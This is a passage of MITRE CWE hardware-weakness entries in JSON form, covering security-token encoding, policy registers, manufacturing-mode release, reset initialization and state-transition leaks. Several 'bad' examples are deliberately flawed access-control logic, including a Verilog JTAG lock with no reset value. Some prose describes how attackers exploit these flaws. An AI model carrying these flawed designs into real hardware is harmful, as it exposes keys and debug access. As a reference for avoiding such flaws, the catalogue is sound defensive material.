(e.g., reset, fetch, compute, etc.). Among various types of message information, a typical transaction is comprised of source identity (identifying the originator of the transaction) and a destination identity (routing the transaction to the respective entity). Sometimes the transactions are qualified with a Security Token. This Security Token helps the destination agent decide on the set of allowed actions (e.g., access to an asset for reads and writes). A policy encoder is used to map the bus transactions to Security Tokens that in turn are used as access-controls/protection mechanisms. A common weakness involves using an encoding which is no longer trusted, i.e., an obsolete encoding."},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"284","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Operating_System":{"attr":{"@_Class":"OS-Independent","@_Prevalence":"Undetermined"}},"Architecture":{"attr":{"@_Class":"Architecture-Independent","@_Prevalence":"Undetermined"}},"Technology":{"attr":{"@_Class":"Technology-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity","Availability","Access Control"],"Impact":["Modify Memory","Read Memory","Modify Files or Directories","Read Files or Directories","DoS: Resource Consumption (Other)","Execute Unauthorized Code or Commands","Gain Privileges or Assume Identity","Bypass Protection Mechanism","Reduce Reliability"],"Likelihood":"High"}},"Potential_Mitigations":{"Mitigation":{"Phase":["Architecture and Design","Implementation"],"Description":{"xhtml:p":["Security Token Decoders should be reviewed for design inconsistency and common weaknesses.","Access and programming flows should be tested in both pre-silicon and post-silicon testing."]},"Effectiveness":"High"}},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":{"xhtml:p":["For example, consider a system that has four bus masters. The table below provides bus masters, their Security Tokens, and trust assumptions.","The policy encoding is to be defined such that Security Token will be used in implemented access-controls. The bits in the bus transaction that contain Security-Token information are Bus_transaction [15:11]. The assets are the AES-Key registers for encryption or decryption. The key of 128 bits is implemented as a set of four, 32-bit registers.","Below is an example of a policy encoding scheme inherited from a previous project where all \\"ODD\\" numbered Security Tokens are trusted."],"xhtml:table":[{"xhtml:tr":[{"xhtml:th":["Bus Master","Security Token Decoding","Trust Assumptions"]},{"xhtml:td":["Master_0","\\"00\\"","Untrusted"]},{"xhtml:td":["Master_1","\\"01\\"","Trusted"]},{"xhtml:td":["Master_2","\\"10\\"","Untrusted"]},{"xhtml:td":["Master_3","\\"11\\"","Untrusted"]}]},{"xhtml:tr":[{"xhtml:th":["Register","Field description"]},{"xhtml:td":["AES_ENC_DEC_KEY_0","AES key [0:31] for encryption or decryption, Default 0x00000000"]},{"xhtml:td":["AES_ENC_DEC_KEY_1","AES key [32:63] for encryption or decryption, Default 0x00000000"]},{"xhtml:td":["AES_ENC_DEC_KEY_2","AES key [64:95] for encryption or decryption, Default 0x00000000"]},{"xhtml:td":["AES_ENC_DEC_KEY_4","AES key [96:127] for encryption or decryption, Default 0x00000000"]}]}]},"Example_Code":[{"attr":{"@_Nature":"bad"},"xhtml:div":[{"#text":"If (Bus_transaction[14] == \\"1\\")Else","xhtml:div":[{"#text":"Trusted = \\"1\\"","attr":{"@_style":"margin-left:10px"}},{"#text":"Trusted = \\"0\\"","attr":{"@_style":"margin-left:10px"}}]},{"#text":"If (trusted)Else","xhtml:div":[{"#text":"Allow access to AES-Key registers","attr":{"@_style":"margin-left:10px"}},{"#text":"Deny access to AES-Key registers","attr":{"@_style":"margin-left:10px"}}]}]},{"attr":{"@_Nature":"good"},"xhtml:div":["Security_Token[4:0] = Bus_transaction[15:11]",{"#text":"If (AES_KEY_ACCESS_POLICY[Security_Token] == \\"1\\")Else","xhtml:div":[{"#text":"Allow access to AES-Key registers","attr":{"@_style":"margin-left:10px;"}},{"#text":"Deny access to AES-Key registers","attr":{"@_style":"margin-left:10px;"}}]}]}],"Body_Text":[{"xhtml:p":"The inherited policy encoding is obsolete and does not work for the new system where an untrusted bus master with an odd Security Token exists in the system, i.e., Master_3 whose Security Token is \\"11\\". Based on the old policy, the untrusted bus master (Master_3) has access to the AES-Key registers. To resolve this, a register AES_KEY_ACCESS_POLICY can be defined to provide necessary, access controls:"},{"xhtml:p":["New Policy:","The AES_KEY_ACCESS_POLICY register defines which agents with a Security Token in the transaction can access the AES-key registers. Each bit in this 32-bit register defines a Security Token. There could be a maximum of 32 security Tokens that are allowed access to the AES-key registers. The number of the bit when set (i.e., \\"1\\") allows respective action from an agent whose identity matches the number of the bit and, if \\"0\\" (i.e., Clear), disallows the respective action to that corresponding agent. Thus, any bus master with Security Token \\"01\\" is allowed access to the AES-Key registers. Below is the Pseudo Code for policy encoding:"],"xhtml:table":{"xhtml:tr":{"xhtml:td":["AES_KEY_ACCESS_POLICY","[31:0] Default 0x00000002 \u2013 agent with Security Token \\"1\\" has access to AES_ENC_DEC_KEY_0 through AES_ENC_DEC_KEY_4 registers"]}}}]}},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"180"}}},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-1093"}}},"Content_History":{"Submission":{"Submission_Name":"Arun Kanuparthi, Hareesh Khattri, Parbati Kumar Manna, Narasimha Kumar V Mangipudi","Submission_Organization":"Intel Corporation","Submission_Date":"2020-04-18"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Applicable_Platforms, Demonstrative_Examples, Description, Modes_of_Introduction, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-07-20","Modification_Comment":"updated Related_Attack_Patterns"}]}},"1268":{"attr":{"@_ID":"1268","@_Name":"Policy Privileges are not Assigned Consistently Between Control and Data Agents","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The product\'s hardware-enforced access control for a particular resource improperly accounts for privilege discrepancies between control and write policies.","Extended_Description":{"xhtml:p":["Integrated circuits and hardware engines may provide access to resources (device-configuration, encryption keys, etc.) belonging to trusted firmware or software modules (commonly set by a BIOS or a bootloader). These accesses are typically controlled and limited by the hardware. Hardware design access control is sometimes implemented using a policy. A policy defines which entity or agent may or may not be allowed to perform an action. When a system implements multiple levels of policies, a control policy may allow direct access to a resource as well as changes to the policies themselves.","Resources that include agents in their control policy but not in their write policy could unintentionally allow an untrusted agent to insert itself in the write policy register. Inclusion in the write policy register could allow a malicious or misbehaving agent write access to resources. This action could result in security compromises including leaked information, leaked encryption keys, or modification of device configuration."]},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"284","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Operating_System":{"attr":{"@_Class":"OS-Independent","@_Prevalence":"Undetermined"}},"Architecture":{"attr":{"@_Class":"Architecture-Independent","@_Prevalence":"Undetermined"}},"Technology":{"attr":{"@_Class":"Technology-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design","Note":"This weakness may be introduced during the design of a device when the architect does not comprehensively specify all of the policies required by an agent."},{"Phase":"Implementation","Note":"This weakness may be introduced during implementation if device policy restrictions do not sufficiently constrain less-privileged clients."}]},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity","Availability","Access Control"],"Impact":["Modify Memory","Read Memory","DoS: Crash, Exit, or Restart","Execute Unauthorized Code or Commands","Gain Privileges or Assume Identity","Bypass Protection Mechanism","Read Files or Directories","Reduce Reliability"],"Likelihood":"High"}},"Potential_Mitigations":{"Mitigation":{"Phase":["Architecture and Design","Implementation"],"Description":"Access-control-policy definition and programming flow must be sufficiently tested in pre-silicon and post-silicon testing."}},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":{"xhtml:p":["Consider a system with a register for storing an AES key for encryption or decryption. The key is composed of 128 bits implemented as a set of four 32-bit registers. The key registers are resources and registers, AES_KEY_CONTROL_POLICY, AES_KEY_READ_POLICY and AES_KEY_WRITE_POLICY, and are defined to provide necessary, access controls.","The control-policy register defines which agents can write to the read-policy and write-policy registers. The read-policy register defines which agents can read the AES-key registers, and write-policy register defines which agents can program or write to those registers. Each 32-bit register can support access control for a maximum of 32 agents. The number of the bit when set (i.e., \\"1\\") allows respective action from an agent whose identity matches the number of the bit and, if \\"0\\" (i.e., Clear), disallows the respective action to that corresponding agent."]},"Example_Code":[{"attr":{"@_Nature":"bad"},"xhtml:table":{"xhtml:tr":[{"xhtml:th":["Register","Field description"]},{"xhtml:td":["AES_ENC_DEC_KEY_0",{"#text":"AES key [0:31] for encryption or decryptionDefault 0x00000000","xhtml:br":""}]},{"xhtml:td":["AES_ENC_DEC_KEY_1",{"#text":"AES key [32:63] for encryption or decryptionDefault 0x00000000","xhtml:br":""}]},{"xhtml:td":["AES_ENC_DEC_KEY_2",{"#text":"AES key [64:95] for encryption or decryptionDefault 0x00000000","xhtml:br":""}]},{"xhtml:td":["AES_ENC_DEC_KEY_3",{"#text":"AES key [96:127] for encryption or decryptionDefault 0x00000000","xhtml:br":""}]},{"xhtml:td":["AES_KEY_CONTROL_POLICY","[31:0] Default 0x00000018, meaning agent with identities \\"4\\" and \\"3\\" has read/write access to this register (i.e., AES_KEY_CONTROL_POLICY), AES_KEY_READ_POLICY, and AES_KEY_WRITE_POLICY registers"]},{"xhtml:td":["AES_KEY_READ_POLICY","[31:0] Default 0x00000002, agent with identity \\"1\\" can only read AES_ENC_DEC_KEY_0 through AES_ENC_DEC_KEY_3 registers"]},{"xhtml:td":["AES_KEY_WRITE_POLICY","[31:0] Default 0x00000004, agent with identity \\"2\\" can only write to AES_ENC_DEC_KEY_0 through AES_ENC_DEC_KEY_3 registers"]}]}},{"attr":{"@_Nature":"good"},"xhtml:table":{"xhtml:tr":[{"xhtml:th":["Register","Field description"]},{"xhtml:td":["AES_KEY_CONTROL_POLICY","[31:0] Default 0x00000010, meaning only agents with an identity of \\"4\\" have read/write access to this register (i.e., AES_KEY_CONTROL_POLICY), AES_KEY_READ_POLICY, and AES_KEY_WRITE_POLICY registers"]},{"xhtml:td":["AES_KEY_READ_POLICY","[31:0] Default 0x00000002, meaning only trusted firmware with an identity of \\"1\\" can program registers: \\nAES_ENC_DEC_KEY_0, AES_ENC_DEC_KEY_1, AES_ENC_DEC_KEY_2, AES_ENC_DEC_KEY_3"]},{"xhtml:td":["AES_KEY_WRITE_POLICY","[31:0] Default 0x00000004, meaning only trusted firmware with an identity of \\"2\\" can program registers: \\nAES_ENC_DEC_KEY_0, AES_ENC_DEC_KEY_1, AES_ENC_DEC_KEY_2, AES_ENC_DEC_KEY_3"]}]}}],"Body_Text":{"xhtml:p":["In the above example, the AES_KEY_CONTROL_POLICY register has agents with identities \\"4\\"and \\"3\\" in its policy. Assuming the agent with identity \\"4\\" is trusted and the agent with identity \\"3\\" is untrusted. The untrusted agent \\"3\\" can write to AES_KEY_WRITE_POLICY with a value of 0x0000000C thus allowing write access to AES_ENC_DEC_KEY_0 through AES_ENC_DEC_KEY_3 registers.","For the above example, the control, read-and-write-policy registers\u2019 values are defined as below."],"xhtml:ol":{"xhtml:li":["The AES_KEY_CONTROL_POLICY defines which agents have write access to the AES_KEY_CONTROL_POLICY, AES_KEY_READ_POLICY, and the AES_KEY_WRITE_POLICY registers,","The AES-key registers can only be read or used by a crypto agent with identity \\"1\\" when bit #1 is set.","The AES-key registers can only be programmed by a trusted firmware with identity \\"2\\" when bit #2 is set."]}}}},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"1"}}},"Notes":{"Note":{"#text":"This entry is still under development and will continue to see updates and content improvements.","attr":{"@_Type":"Maintenance"}}},"Content_History":{"Submission":{"Submission_Name":"Arun Kanuparthi, Hareesh Khattri, Parbati Kumar Manna, Narasimha Kumar V Mangipudi","Submission_Organization":"Intel Corporation","Submission_Date":"2020-02-12"},"Modification":{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Demonstrative_Examples, Description, Modes_of_Introduction, Name, Potential_Mitigations, Related_Attack_Patterns"},"Previous_Entry_Name":{"#text":"Agents Included in Control Policy are not Contained in Less-Privileged Policy","attr":{"@_Date":"2020-08-20"}}}},"1269":{"attr":{"@_ID":"1269","@_Name":"Product Released in Non-Release Configuration","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The product released to market is released in pre-production or manufacturing configuration.","Extended_Description":{"xhtml:p":["Products in the pre-production or manufacturing stages are configured to have many debug hooks and debug capabilities, including but not limited to:","The above is by no means an exhaustive list, but it alludes to the greater capability and the greater state of vulnerability of a product during it\'s preproduction or manufacturing state.","Complexity increases when multiple parties are involved in executing the tests before the final production version. For example, a chipmaker might fabricate a chip and run its own preproduction tests, following which the chip would be delivered to the Original Equipment Manufacturer (OEM), who would now run a second set of different preproduction tests on the same chip. Only after both of these sets of activities are complete, can the overall manufacturing phase be called \u201ccomplete\u201d and have the \u201cManufacturing Complete\u201d fuse blown. However, if the OEM forgets to blow the Manufacturing Complete fuse, then the system remains in the manufacturing stage, rendering the system both exposed and vulnerable."],"xhtml:ul":{"xhtml:li":["Ability to override/bypass various cryptographic checks (including authentication, authorization, and integrity)","Ability to read/write/modify/dump internal state (including registers and memory)","Ability to change system configurations","Ability to run hidden or private commands that are not allowed during production (as they expose IP)."]}},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"693","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":[{"attr":{"@_Name":"VHDL","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"Verilog","@_Prevalence":"Undetermined"}},{"attr":{"@_Class":"Compiled","@_Prevalence":"Undetermined"}}],"Operating_System":{"attr":{"@_Class":"OS-Independent","@_Prevalence":"Undetermined"}},"Architecture":{"attr":{"@_Class":"Architecture-Independent","@_Prevalence":"Undetermined"}},"Technology":[{"attr":{"@_Name":"Other","@_Prevalence":"Undetermined"}},{"attr":{"@_Class":"Technology-Independent","@_Prevalence":"Undetermined"}}]},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Implementation"},{"Phase":"Integration"},{"Phase":"Manufacturing"}]},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity","Availability","Access Control","Accountability","Authentication","Authorization","Non-Repudiation"],"Impact":"Other","Likelihood":"High"}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Implementation","Description":"Ensure that there exists a marker for denoting the Manufacturing Complete stage and that the Manufacturing Complete marker gets updated at the Manufacturing Complete stage (i.e., the Manufacturing Complete fuse gets blown)."},{"Phase":"Integration","Description":"Ensure that there exists a marker for denoting the Manufacturing Complete stage and that the Manufacturing Complete marker gets updated at the Manufacturing Complete stage (i.e., the Manufacturing Complete fuse gets blown)."},{"Phase":"Manufacturing","Description":"Ensure that there exists a marker for denoting the Manufacturing Complete stage and that the Manufacturing Complete marker gets updated at the Manufacturing Complete stage (i.e., the Manufacturing Complete fuse gets blown)."}]},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"This example shows what happens when a preproduction system is made available for production.","Example_Code":[{"#text":"Suppose the chipmaker has a way of scanning all the internal memory (containing chipmaker-level secrets) during the manufacturing phase, and the way the chipmaker or the Original Equipment Manufacturer (OEM) marks the end of the manufacturing phase is by blowing a Manufacturing Complete fuse. Now, suppose that whoever blows the Manufacturing Complete fuse inadvertently forgets to execute the step to blow the fuse.","attr":{"@_Nature":"bad"}},{"#text":"Blow the Manufacturing Complete fuse.","attr":{"@_Nature":"good"}}],"Body_Text":"An attacker will now be able to scan all the internal memory (containing chipmaker-level secrets)."}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2019-13945","Description":"Regarding SSA-686531, a hardware based manufacturing access on S7-1200 and\\nS7-200 SMART has occurred. A vulnerability has been identified in SIMATIC S7-1200 CPU family (incl. SIPLUS variants) (All versions), SIMATIC S7-200 SMART CPU family (All versions). There is an access mode used during manufacturing of S7-1200 CPUs that allows additional diagnostic functionality. The security vulnerability could be exploited by an attacker with physical access to the UART interface during boot process. At the time of advisory publication, no public exploitation of this security vulnerability was known.","Link":"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13945"},{"Reference":"CVE-2018-4251","Description":"Laptops with Intel chipsets were found to be running in Manufacturing Mode. After this information was reported to the OEM, the vulnerability (CVE-2018-4251) was patched disallowing access to the interface.","Link":"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-4251"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"439"}}},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-1103"}}},"Content_History":{"Submission":{"Submission_Name":"Arun Kanuparthi, Hareesh Khattri, Parbati Kumar Manna, Narasimha Kumar V Mangipudi","Submission_Organization":"Intel Corporation","Submission_Date":"2020-05-31"},"Modification":{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Description, Related_Attack_Patterns"}}},"1270":{"attr":{"@_ID":"1270","@_Name":"Generation of Incorrect Security Tokens","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The product implements a Security Token mechanism to differentiate what actions are allowed or disallowed when a transaction originates from an entity. However, the Security Tokens generated in the system are incorrect.","Extended_Description":{"xhtml:p":"Systems-On-a-Chip (SoC) (Integrated circuits and hardware engines) implement Security Tokens to differentiate and identify actions originated from various agents. These actions could be \\"read\\", \\"write\\", \\"program\\", \\"reset\\", \\"fetch\\", \\"compute\\", etc. Security Tokens are generated and assigned to every agent on the SoC that is either capable of generating an action or receiving an action from another agent. Every agent could be assigned a unique, Security Token based on its trust level or privileges. Incorrectly generated Security Tokens could result in the same token used for multiple agents or multiple tokens being used for the same agent. This condition could result in a Denial-of-Service (DoS) or the execution of an action that in turn could result in privilege escalation or unintended access."},"Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"284","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"1294","@_View_ID":"1194","@_Ordinal":"Primary"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Operating_System":{"attr":{"@_Class":"OS-Independent","@_Prevalence":"Undetermined"}},"Architecture":{"attr":{"@_Class":"Architecture-Independent","@_Prevalence":"Undetermined"}},"Technology":{"attr":{"@_Class":"Technology-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity","Availability","Access Control"],"Impact":["Modify Files or Directories","Execute Unauthorized Code or Commands","Bypass Protection Mechanism","Gain Privileges or Assume Identity","Read Memory","Modify Memory","DoS: Crash, Exit, or Restart"],"Likelihood":"High"}},"Potential_Mitigations":{"Mitigation":{"Phase":["Architecture and Design","Implementation"],"Description":{"xhtml:ul":{"xhtml:li":["Generation of Security Tokens should be reviewed for design inconsistency and common weaknesses.","Security-Token definition and programming flow should be tested in pre-silicon and post-silicon testing."]}}}},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"Consider a system with a register for storing an AES key for encryption or decryption. The key is 128 bits long implemented as a set of four 32-bit registers. The key registers are assets, and register, AES_KEY_ACCESS_POLICY, is defined to provide necessary access controls. The access-policy register defines which agents, using a Security Token, may access the AES-key registers. Each bit in this 32-bit register is used to define a Security Token. There could be a maximum of 32 Security Tokens that are allowed access to the AES-key registers. When set (bit = \\"1\\") bit number allows action from an agent whose identity matches that bit number. If Clear (bit = \\"0\\") the action is disallowed for the corresponding agent.","Body_Text":[{"#text":"Let\\"s assume the system has two agents: a Main-controller and an Aux-controller. The respective Security Tokens are \\"1\\" and \\"2\\".","xhtml:table":{"xhtml:tr":[{"xhtml:th":["Register","Description","Default"]},{"xhtml:td":["AES_ENC_DEC_KEY_0","AES key [0:31] for encryption or decryption",0]},{"xhtml:td":["AES_ENC_DEC_KEY_1","AES key [32:63] for encryption or decryption",0]},{"xhtml:td":["AES_ENC_DEC_KEY_2","AES key [64:95] for encryption or decryption",0]},{"xhtml:td":["AES_ENC_DEC_KEY_3","AES key [96:127] for encryption or decryption",0]},{"xhtml:td":["AES_KEY_ACCESS_POLICY","AES key access register [31:0]",2]}]}},"An agent with a Security Token \\"1\\" has access to AES_ENC_DEC_KEY_0 through AES_ENC_DEC_KEY_3 registers. As per the above access policy, the AES-Key-access policy allows access to the AES-key registers if the security Token is \\"1\\".","Both agents have access to the AES-key registers."],"Example_Code":[{"#text":"The SoC incorrectly generates Security Token \\"1\\" for every agent. In other words, both Main-controller and Aux-controller are assigned Security Token \\"1\\".","attr":{"@_Nature":"bad","@_Language":"Other"}},{"#text":"The SoC should correctly generate Security Tokens, assigning \\"1\\" to the Main-controller and \\"2\\" to the Aux-controller","attr":{"@_Nature":"good","@_Language":"Other"}}]}},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"180"}},{"attr":{"@_CAPEC_ID":"633"}}]},"Content_History":{"Submission":{"Submission_Name":"Arun Kanuparthi, Hareesh Khattri, Parbati Kumar Manna, Narasimha Kumar V Mangipudi","Submission_Organization":"Intel Corporation","Submission_Date":"2020-03-06"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Applicable_Platforms, Demonstrative_Examples, Description, Modes_of_Introduction, Name, Potential_Mitigations, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-07-20","Modification_Comment":"updated Related_Attack_Patterns"}],"Previous_Entry_Name":{"#text":"Generation of Incorrect Security Identifiers","attr":{"@_Date":"2020-08-20"}}}},"1271":{"attr":{"@_ID":"1271","@_Name":"Uninitialized Value on Reset for Registers Holding Security Settings","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"Security-critical logic is not set to a known value on reset.","Extended_Description":{"xhtml:p":"When the device is first brought out of reset, the state of registers will be indeterminate if they have not been initialized by the logic. Before the registers are initialized, there will be a window during which the device is in an insecure state and may be vulnerable to attack."},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"665","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Primary"}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Operating_System":{"attr":{"@_Class":"OS-Independent","@_Prevalence":"Undetermined"}},"Architecture":{"attr":{"@_Class":"Architecture-Independent","@_Prevalence":"Undetermined"}},"Technology":{"attr":{"@_Class":"Technology-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":["Access Control","Authentication","Authorization"],"Impact":"Varies by Context"}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Implementation","Description":"Design checks should be performed to identify any uninitialized flip-flops used for security-critical functions."},{"Phase":"Architecture and Design","Description":"All registers holding security-critical information should be set to a specific value on reset."}]},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"Shown below is a positive clock edge triggered flip-flop used to implement a lock bit for test and debug interface. When the circuit is first brought out of reset, the state of the flip-flop will be unknown until the enable input and D-input signals update the flip-flop state. In this example, an attacker can reset the device until the test and debug interface is unlocked and access the test interface until the lock signal is driven to a known state by the logic.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"Other"},"xhtml:div":{"#text":"always @(posedge clk) beginend","xhtml:div":{"#text":"if (en) lock_jtag &lt;= d;","attr":{"@_style":"margin-left:10px;"}}}},{"attr":{"@_Nature":"good","@_Language":"Other"},"xhtml:div":{"#text":"always @(posedge clk) beginend","xhtml:div":[{"#text":"if (~reset) lock_jtag &lt;= 0;","attr":{"@_style":"margin-left:10px;"}},{"#text":"else if (en) lock_jtag &lt;= d;","attr":{"@_style":"margin-left:10px;"}}]}}],"Body_Text":"The flip-flop can be set to a known value (0 or 1) on reset, but requires that the logic explicitly update the output of the flip-flop if the reset signal is active."}},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"74"}}},"Notes":{"Note":{"#text":"This entry is still under development and will continue to see updates and content improvements.","attr":{"@_Type":"Maintenance"}}},"Content_History":{"Submission":{"Submission_Name":"Nicole Fern","Submission_Organization":"Tortuga Logic","Submission_Date":"2020-05-15"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Common_Consequences, Demonstrative_Examples, Description, Modes_of_Introduction, Name, Potential_Mitigations, Related_Attack_Patterns, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Name, Type"}],"Previous_Entry_Name":[{"#text":"Missing Known Value on Reset for Registers Holding Security Settings","attr":{"@_Date":"2020-08-20"}},{"#text":"Unitialized Value on Reset for Registers Holding Security Settings","attr":{"@_Date":"2021-03-15"}}]}},"1272":{"attr":{"@_ID":"1272","@_Name":"Sensitive Information Uncleared Before Debug/Power State Transition","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Stable"},"Description":"The product performs a power or debug state transition, but it does not clear sensitive information that should no longer be accessible due to changes to information access restrictions.","Extended_Description":{"xhtml:p":"A device or system frequently employs many power and sleep states during its normal operation (e.g., normal power, additional power, low power, hibernate, deep sleep, etc.). A device also may be operating within a debug condition. State transitions can happen from one power or debug state to another. If there is information available in the previous state which should not be available in the next state and is not properly removed before the transition into the next state, sensitive information may leak from the system."},"Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"226","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"CanPrecede","@_CWE_ID":"200","@_View_ID":"1000","@_Ordinal":"Primary"}}]},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Primary"}},"Applicable_Platforms":{"Language":[{"attr":{"@_Name":"VHDL","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"Verilog","@_Prevalence":"Undetermined"}},{"attr":{"@_Class":"Compiled","@_Prevalence":"Undetermined"}}],"Operating_System":{"attr":{"@_Class":"OS-Independent","@_Prevalence":"Undetermined"}},"Architecture":{"attr":{"@_Class":"Architecture-Independent","@_Prevalence":"Undetermined"}},"Technology":{"attr":{"@_Class":"Technology-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Architecture and Design"}},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity","Availability","Access Control","Accountability","Authentication","Authorization","Non-Repudiation"],"Impact":["Read Memory","Read Application Data"],"Likelihood":"High","Note":"Sensitive information may be used to unlock additional capabilities of the device and take advantage of hidden functionalities which could be used to compromise device security."}},"Detection_Methods":{"Detection_Method":{"Method":"Manual Analysis","Description":"Write a known pattern into each sensitive location. Enter the power/debug state in question. Read data back from the sensitive locations. If the reads are successful, and the data is the same as the pattern that was originally written, the test fails and the device needs to be fixed. Note that this test can likely be automated.","Effectiveness":"High"}},"Potential_Mitigations":{"Mitigation":{"Phase":["Architecture and Design","Implementation"],"Description":"During state transitions, information not needed in the next state should be removed before the transition to the next state."}},"Demonstrative_Examples":{"Demonstrative_Example":{"attr":{"@_Demonstrative_Example_ID":"DX-147"},"Intro_Text":"This example shows how an attacker can take advantage of an incorrect state transition.","Body_Text":[{"xhtml:p":"Suppose a device is transitioning from state A to state B. During state A, it can read certain private keys from the hidden fuses that are only accessible in state A but not in state B. The device reads the keys, performs operations using those keys, then transitions to state B, where those private keys should no longer be accessible."},{"xhtml:p":"After the transition to state B, even though the private keys are no longer accessible directly from the fuses in state B, they can be accessed indirectly by reading the memory that contains the private keys."}],"Example_Code":[{"attr":{"@_Nature":"bad"},"xhtml:p":"During the transition from A to B, the device does not scrub the memory."},{"#text":"For transition from state A to state B, remove information which should not be available once the transition is complete.","attr":{"@_Nature":"good"}}]}},"Observed_Examples":{"Observed_Example":{"Reference":"CVE-2020-12926","Description":"Product software does not set a flag as per TPM specifications, thereby preventing a failed authorization attempt from being recorded after a loss of power.","Link":"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-12926"}},"Functional_Areas":{"Functional_Area":"Power"},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"150"}},{"attr":{"@_CAPEC_ID":"37"}},{"attr":{"@_CAPEC_ID":"545"}},{"attr":{"@_CAPEC_ID":"546"}}]},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-1220"}}},"Content_History":{"Submission":{"Submission_Name":"Parbati Kumar Manna, Hareesh Khattri, Arun Kanuparthi","Submission_Organization":"Intel Corporation","Submission_Date":"2020-05-31"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Applicable_Platforms, Common_Consequences, Demonstrative_Examples, Description, Name, Potential_Mitigations, Related_Attack_Patterns, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Functional_Areas"}],"Previous_Entry_Name":{"#text":"Debug/Power State Transitions Leak Information","attr":{"@_Date":"2020-08-20"}}}},"1273":{"attr":{"@_ID":"1273","@_Name":"Device Unlock 